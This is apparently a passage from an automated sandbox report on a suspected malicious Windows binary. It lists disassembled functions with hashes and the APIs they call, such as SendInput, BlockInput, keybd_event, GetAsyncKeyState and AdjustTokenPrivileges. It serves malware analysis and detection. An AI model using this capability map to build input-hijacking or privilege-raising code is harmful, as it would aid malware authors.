                                                                                                                      • Instruction ID: 0a1047b184aa6aecb553654a05710b0550f1ca3cdd71459502785c1ac958fc63
                                                                                                                      • Opcode Fuzzy Hash: 5e03e59deea224d8c8af76ba73f9bc5bda11955daf59c28fee02351a4a742a5f
                                                                                                                      • Instruction Fuzzy Hash: B7F0A03550032DBBDB22AFA4CC49FEA7B6CFF49761F008165B919DA181D730DA40CBA4
                                                                                                                      Function 003E4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 003E4B89
                                                                                                                      • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 003E4B9C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3536248340-0
                                                                                                                      • Opcode ID: f9caadc6107a2187b0ae3ad8ce9050b1aeaa01518c065917c84900c681284eee
                                                                                                                      • Instruction ID: def57864608549853eab70551f6d5d8d415547377d3ad818399219cbaa318156
                                                                                                                      • Opcode Fuzzy Hash: f9caadc6107a2187b0ae3ad8ce9050b1aeaa01518c065917c84900c681284eee
                                                                                                                      • Instruction Fuzzy Hash: 59F06D7090028EAFDB068FA1C805BBE7BB4AF04305F008419F951A5291D3B9C6129F94
                                                                                                                      Function 003DB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003DB9EC), ref: 003DB8C5
                                                                                                                      • CloseHandle.KERNEL32(?,?,003DB9EC), ref: 003DB8D7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 81990902-0
                                                                                                                      • Opcode ID: 0c63cda01152e683a7ac3895b1ccc558fc6538cf4d152cfb118ed15e9f745bd3
                                                                                                                      • Instruction ID: 955e160f75a1241a9b98867cc890ee13b1acd1c9d8bbcc8c5aa5e64d2b1d79d5
                                                                                                                      • Opcode Fuzzy Hash: 0c63cda01152e683a7ac3895b1ccc558fc6538cf4d152cfb118ed15e9f745bd3
                                                                                                                      • Instruction Fuzzy Hash: FEE04632000600EEE72A2B64EC08E72BBE9EF04310B15882EF49680430CB62AC91EB10
                                                                                                                      Function 0040F594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040F59C
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0041F3AD,?,?,?,?), ref: 0040F5C6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: a0bcf7d767ad150470e3b810fc92946ff932d8c0625cc5421e12ed6ede07ddcb
                                                                                                                      • Instruction ID: ca4c9f4ca0598777e13c643b30cfccb8e57e0c1a4bcbce4a66519260efa741e0
                                                                                                                      • Opcode Fuzzy Hash: a0bcf7d767ad150470e3b810fc92946ff932d8c0625cc5421e12ed6ede07ddcb
                                                                                                                      • Instruction Fuzzy Hash: 78E0CD30104218BBEB340F09DC0AF793B54FB00750F108536F917D80E1D7B48491D668
                                                                                                                      Function 003C8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,003A125D,003C7A43,003A0F35,?,?,00000001), ref: 003C8E41
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003C8E4A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 791f81970d9c88182280dd556d99e617b3025e65558e20fe6402bc90762327c2
                                                                                                                      • Instruction ID: 5bfa2b19abe9f974c6b11d11f04db74232d0ef31c66df1428dd04adb2c89745c
                                                                                                                      • Opcode Fuzzy Hash: 791f81970d9c88182280dd556d99e617b3025e65558e20fe6402bc90762327c2
                                                                                                                      • Instruction Fuzzy Hash: 06B09271644A08ABFB106BA1EC09B983F68EB08A62F8040A0FA1D440608B6354528A9A
                                                                                                                      Function 003D113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1f9e1e0d3a9110cce887a051fcf742942c707c5aecfbab5cd6bbeb98ac270c87
                                                                                                                      • Instruction ID: 1abdecff7b4a9d1dc37e8363d255b8837d840fcca4cff66a617cbd2c811375ae
                                                                                                                      • Opcode Fuzzy Hash: 1f9e1e0d3a9110cce887a051fcf742942c707c5aecfbab5cd6bbeb98ac270c87
                                                                                                                      • Instruction Fuzzy Hash: 43B11421D2AF404DD32396399971336B75CAFBB2C5F91E72BFC2674D62EB2285834180
                                                                                                                      Function 004102AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00410352
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: bb4cd4f9c1783cfa43922a60e261f8be742ea4f77eaba4554c362ec848486e78
                                                                                                                      • Instruction ID: 71a0871cdcf95677943cbf02c44736cf216369ae47743df4f200b34183b42bd9
                                                                                                                      • Opcode Fuzzy Hash: bb4cd4f9c1783cfa43922a60e261f8be742ea4f77eaba4554c362ec848486e78
                                                                                                                      • Instruction Fuzzy Hash: 68112B31204219BBF7251B288D49FFA3614E741760F24432BFD219A1E2CAF88DD1D2AE
                                                                                                                      Function 0040E769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0040E7AF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CallLongProc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4084987330-0
                                                                                                                      • Opcode ID: 4198516a768cf5eca6c0c884e2feb0de2230ad64cb0e8dc0fceb11d892aa9694
                                                                                                                      • Instruction ID: 07a80f20bad0c74b5915f5916d6c6ebac07984b1eac31f0e99bf7cda1d02aaf4
                                                                                                                      • Opcode Fuzzy Hash: 4198516a768cf5eca6c0c884e2feb0de2230ad64cb0e8dc0fceb11d892aa9694
                                                                                                                      • Instruction Fuzzy Hash: DDF04F31200108FFCF05AF55DC40DBA3BAAEB04360B048926FA159B6B1D7769D71EB99
                                                                                                                      Function 0040EA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB736: GetCursorPos.USER32(000000FF), ref: 003BB749
                                                                                                                        • Part of subcall function 003BB736: ScreenToClient.USER32(00000000,000000FF), ref: 003BB766
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000001), ref: 003BB78B
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000002), ref: 003BB799
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0041F417,?,?,?,?,?,00000001,?), ref: 0040EA9C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2356834413-0
                                                                                                                      • Opcode ID: d9478ab33aa33cdd5a0d29d82c546f7bef8425c6e1ba8db0c4152a70f7231be1
                                                                                                                      • Instruction ID: e0b7b80e003fcd250b3a47030510eaedc29a8a2fd46a4cdb85d179b45da9296d
                                                                                                                      • Opcode Fuzzy Hash: d9478ab33aa33cdd5a0d29d82c546f7bef8425c6e1ba8db0c4152a70f7231be1
                                                                                                                      • Instruction Fuzzy Hash: 96F08231200219ABDB15AF15CC06ABA3B61FB04794F044025FA165B1A1D7B69972DBD5
                                                                                                                      Function 003BB7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,003BAF40,?,?,?,?,?), ref: 003BB83B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: 2f0bdaf5179be69c3fb88169a6086ae2f3dd5ecf031ffb3acca005bced999e73
                                                                                                                      • Instruction ID: 9b6c21b2eef33fd30af24c76f7b15af8516502a35a98d481ce431d78a339baa2
                                                                                                                      • Opcode Fuzzy Hash: 2f0bdaf5179be69c3fb88169a6086ae2f3dd5ecf031ffb3acca005bced999e73
                                                                                                                      • Instruction Fuzzy Hash: 48F08934600209DFDB15EF14DC519753BA6FB05360F144129F9528B6B0E7B1DC51DB55
                                                                                                                      Function 003F703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • BlockInput.USER32(00000001), ref: 003F7057
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlockInput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3456056419-0
                                                                                                                      • Opcode ID: 4332ccf25c9d255d18874c30d4a54bad5dbedc054eef94c6197c616165b95cb1
                                                                                                                      • Instruction ID: 1f242d97550c40700fa7f66fbc714b4e1ef2519030301191ff3c109b0dfe570f
                                                                                                                      • Opcode Fuzzy Hash: 4332ccf25c9d255d18874c30d4a54bad5dbedc054eef94c6197c616165b95cb1
                                                                                                                      • Instruction Fuzzy Hash: 90E012752142055FC7109B69D404A96F7DD9F59750F018426AA45D7251DAB0E8008BA0
                                                                                                                      Function 0040F3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0040F41A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogNtdllProc_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3239928679-0
                                                                                                                      • Opcode ID: 2a083362c7fb6accf77206ce9a72a016ff65136573d28150e07d1ad4872939fe
                                                                                                                      • Instruction ID: dc398a2e89c7c49fcc4ee6b22d14ab4d9c5f379711cec635f1a48a069e62b747
                                                                                                                      • Opcode Fuzzy Hash: 2a083362c7fb6accf77206ce9a72a016ff65136573d28150e07d1ad4872939fe
                                                                                                                      • Instruction Fuzzy Hash: 45F06531204245BFDB21EF58DC05FC63B95FB05360F184429FA51672E1DB756820D769
                                                                                                                      Function 003BAC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 003BACC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: 767d424c25411ca3f085577a6de82e0eb535e20b9af4a6f1ed6535ec1a115d43
                                                                                                                      • Instruction ID: cc8152b16d1f2fd73146fedb6868f884a46fd63c9600629dab4d8f4329d79325
                                                                                                                      • Opcode Fuzzy Hash: 767d424c25411ca3f085577a6de82e0eb535e20b9af4a6f1ed6535ec1a115d43
                                                                                                                      • Instruction Fuzzy Hash: 43E08C31200208FBCF05AF90CC01EA83B26FB48384F108028F6058F6B1CB73A422EB45
                                                                                                                      Function 0040F425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0041F3D4,?,?,?,?,?,?), ref: 0040F450
                                                                                                                        • Part of subcall function 0040E13E: _memset.LIBCMT ref: 0040E14D
                                                                                                                        • Part of subcall function 0040E13E: _memset.LIBCMT ref: 0040E15C
                                                                                                                        • Part of subcall function 0040E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00463EE0,00463F24), ref: 0040E18B
                                                                                                                        • Part of subcall function 0040E13E: CloseHandle.KERNEL32 ref: 0040E19D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2364484715-0
                                                                                                                      • Opcode ID: b398f14e10f31a9d24a3532f55e127235751c7b1050bbcf0681cdc1dba31d229
                                                                                                                      • Instruction ID: 2b9854e28f251cf595ff7abb9a1a675f1df901561ccf51f1c1230289a6ca45c3
                                                                                                                      • Opcode Fuzzy Hash: b398f14e10f31a9d24a3532f55e127235751c7b1050bbcf0681cdc1dba31d229
                                                                                                                      • Instruction Fuzzy Hash: 99E04631200208EFCB21EF19DC04E9A37A2FB08344F058036FA006B2B2C771A861EF49
                                                                                                                      Function 0040F37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtdllDialogWndProc_W.NTDLL ref: 0040F3A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
